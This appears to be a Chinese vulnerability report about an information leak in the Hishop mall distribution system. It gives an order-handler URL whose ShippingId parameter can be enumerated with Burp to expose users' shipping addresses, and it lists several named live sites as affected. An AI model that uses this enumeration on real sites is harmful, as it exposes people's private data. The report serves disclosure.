Hishop商城分销系统某处信息泄露

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: RT ### 详细说明: 前人案例: ``` http://wooyun.org/bugs/wooyun-2010-019206 ``` 泄露地址: ``` /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 ``` 其中ID值为可控的,用BURP不断遍历可以找出非常多的用户信息 案例: ``` http://demo.kuaidiantong.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 http://dj.gzdisc.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.xxsp.me/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.eme.com.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://xn--ehqsq872berelo3bbjl.xn--fiqs8s/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 ``` ### 漏洞证明: ``` http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 ``` [<img src="https://images.seebug.org/upload/201505/26215515fa895b57d5e939e502236242a3130c69.jpg" alt="01.jpg" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息